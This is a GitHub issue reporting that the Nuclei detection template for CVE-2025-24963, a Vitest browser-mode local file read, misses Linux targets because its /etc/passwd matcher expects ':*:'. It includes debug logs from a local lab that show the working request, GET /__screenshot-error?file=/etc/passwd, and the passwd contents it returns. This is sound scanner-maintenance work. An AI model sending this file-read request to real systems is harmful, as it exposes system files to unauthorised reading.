Skip to content

[FALSE-NEGATIVE]: CVE-2025-24963 on Linux Targets (Ubuntu/Debian) due to strict /etc/passwd matching #15205

Closed
#15301
Closed
[FALSE-NEGATIVE]: CVE-2025-24963 on Linux Targets (Ubuntu/Debian) due to strict /etc/passwd matching#15205
#15301
Assignees
Akokonunes
Labels
false-negativeNuclei template missing valid results
@omarkurt

Description

@omarkurt
omarkurt
opened on Feb 6, 2026

Template IDs or paths

http/cves/2025/CVE-2025-24963.yaml

Environment

- OS: MacOS
- Nuclei: v3.5.1
- Go: go1.25.5

Steps To Reproduce

I noticed that the current Nuclei template for CVE-2025-24963 uses a pretty strict matcher for /etc/passwd. It expects the root user's password field to be :*::

nuclei-templates/http/cves/2025/CVE-2025-24963.yaml

Line 44 in 6a5bc0d

- "contains_all(body,'root',':*:','/bin/')"

This works perfectly on BSD and macOS systems where the password field is usually *. But on modern Linux distros (like Ubuntu, Debian, CentOS) that use shadow passwords, that field is actually an x (like root:x:0:0:...).

So, when scanning a vulnerable Linux-based target, we end up getting a False Negative, which might give a false sense of security.

I noticed this while dockerizing the application as a Vulnerable Target (VT) and conducting some experiments. The detailed differences are listed below.

- "contains_all(body,'root',':*:','/bin/') || contains_all(body,'root',':x:','/bin/')"

Reproduction with Original Nuclei Template

  1. Setup a vulnerable environment with VT using the official Docker image (which is Ubuntu-based) or any standard Linux server.
  2. Run the current template CVE-2025-24963.yaml.
  3. The server responds with 200 OK and the /etc/passwd content, but the matcher fails because it doesn't find :*: in the body.
root@vulnerabletarget % nuclei -t CVE-2025-24963.yaml -u http://localhost:63315/ -vv --debug
...
 
[INF] Current nuclei version: v3.5.1 (outdated)
[INF] Current nuclei-templates version: v10.3.8 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 457
[INF] Templates loaded for current scan: 1
[INF] Executing 1 signed templates from projectdiscovery/nuclei-templates
[INF] Targets loaded for current scan: 1
[CVE-2025-24963] Vitest Browser Mode - Local File Read (@iamnoooob,@rootxharsh,@pdresearch) [medium]
[INF] [CVE-2025-24963] Dumped HTTP request for http://localhost:63315/__screenshot-error?file=/etc/passwd

GET /__screenshot-error?file=/etc/passwd HTTP/1.1
Host: localhost:63315
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:1.9.6.20) Gecko/ Firefox/3.6.19
Connection: close
Accept: */*
Accept-Encoding: gzip

[DBG] [CVE-2025-24963] Dumped HTTP response http://localhost:63315/__screenshot-error?file=/etc/passwd

HTTP/1.1 200 OK
Connection: close
Content-Length: 1185
Cache-Control: public,max-age=0,must-revalidate
Content-Type: image/png
Date: Fri, 06 Feb 2026 18:58:14 GMT

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
pwuser:x:1000:1000:,,,:/home/pwuser:/bin/bash
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:105::/nonexistent:/usr/sbin/nologin
[INF] Scan completed in 6.108375ms. No results found.

Reproduction with Changed for VT

  1. Setup a vulnerable environment with VT using the official Docker image (which is Ubuntu-based) or any standard Linux server.
  2. Run the current template [vt-2025-24963.nuclei.yaml](https://github.com/HappyHackingSpace/vt-templates/blob/main/cves/vt-2025-24963/vt-2025-24963.nuclei.yaml).
  3. The server responds with 200 OK and the /etc/passwd content, but the matcher fails because it doesn't find :*: in the body.
root@vulnerabletarget % nuclei -t vt-2025-24963.nuclei.yaml -u http://localhost:63315/ -vv --debug
...

[INF] Current nuclei version: v3.5.1 (outdated)
[INF] Current nuclei-templates version: v10.3.8 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 457
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] [vt-2025-24963] Dumped HTTP request for http://localhost:63315/__screenshot-error?file=/etc/passwd

GET /__screenshot-error?file=/etc/passwd HTTP/1.1
Host: localhost:63315
User-Agent: Mozilla/5.0 (Kubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Encoding: gzip

[DBG] [vt-2025-24963] Dumped HTTP response http://localhost:63315/__screenshot-error?file=/etc/passwd

HTTP/1.1 200 OK
Connection: close
Content-Length: 1185
Cache-Control: public,max-age=0,must-revalidate
Content-Type: image/png
Date: Fri, 06 Feb 2026 19:03:10 GMT

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
pwuser:x:1000:1000:,,,:/home/pwuser:/bin/bash
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:105::/nonexistent:/usr/sbin/nologin
[vt-2025-24963:dsl-1] [http] [medium] http://localhost:63315/__screenshot-error?file=/etc/passwd
[INF] Scan completed in 65.84575ms. 1 matches found.

Note

I found this solution on the VT side. It seems more appropriate than modifying contains_all. contains_all is used in over 500 templates, so similar issues might exist in other templates as well.

Relevant dumped responses



Anything else?


No response
Metadata
Metadata
Assignees
Labels
false-negativeNuclei template missing valid results
Type
No type
Projects
No projects
Milestone
No milestone
Relationships
None yet
Development
No branches or pull requests
Issue actions